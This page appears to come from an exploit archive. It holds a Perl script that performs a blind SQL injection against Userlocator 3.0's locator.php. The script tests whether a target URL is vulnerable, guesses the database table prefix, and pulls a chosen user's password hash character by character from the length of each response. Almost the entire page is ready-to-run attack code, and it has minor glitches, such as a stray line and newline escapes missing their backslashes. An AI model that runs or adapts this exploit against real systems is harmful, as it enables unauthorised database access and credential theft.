[Exploit] [Remote] [Local] [Web Apps] [Dos/Poc] [Shellcode] [RSS]
# Title : Userlocator 3.0 (y) Remote Blind SQL Injection Exploit
# Published : 2008-12-21
# Author : katharsis
# Previous Title : RoundCube Webmail <= 0.2b Remote Code Execution Exploit
# Next Title : ReVou Twitter Clone Arbitrary File Upload Vulnerability
#!/usr/bin/perl -w
use strict;
use LWP::Simple;
$| = 1;
p
print q {
:::::::::::::::::::::::::::::
:: Userlocator 3.0 Exploit ::
:: written by katharsis ::
:::::::::::::::::::::::::::::
[~] www.katharsis.x2.to
[~] nebelfrost23@web.de
};
if (@ARGV < 2) {
print "Usage: usrlocsploit.pl [url] [user id]nExample: usrlocsploit.pl www.target.com 1n";
exit;
}
my $page = shift;
my $uid = shift;
my $prefix;
my @charset = ('a','b','c','d','e','f','1','2','3','4','5','6','7','8','9','0');
print "[x] Vulnerability check...n";
my $chreq = get("http://".$page."/locator.php?action=get_user&y='");
if (($chreq =~ m/Database error/i) || ($chreq =~ m/Invalid SQL/i)) {
print "[x] Seems to be vulnerable!n";
} else {
print "[o] Seems to be patched, sorryn";
exit;
}
print "[^] Prefix check...n";
if ($chreq =~ m/(..._)wlw/i) {
print "[^] Success, using Prefix '$1'n";
$prefix = $1;
} else {
print "[o] Can't find prefix, using 'bb1_'n";
$prefix = "bb1";
}
print "[+] Getting hash...n";
print "[+] Hash: ";
my $curnum = 1;
while($curnum < 32) {
my $false_result = get("http://".$page."/locator.php?action=get_user&x=233&y=365'/**/OR/**/ascii(substring((SELECT+password+FROM+".$prefix."users+WHERE+userid=".$uid."),".$curnum."))=-1/*");
foreach(@charset) {
my $ascode = ord($_);
my $result = get("http://".$page."/locator.php?action=get_user&x=233&y=365'/**/OR/**/ascii(substring((SELECT+password+FROM+".$prefix."users+WHERE+userid=".$uid."),".$curnum."))=".$ascode."/*");
if (length($result) != 0) {
if (length($result) != length($false_result)) {
print chr($ascode);
$curnum++;
}
}
}
}
print "n[+] Done!n";
# EOF
# www.Syue.com [2008-12-21]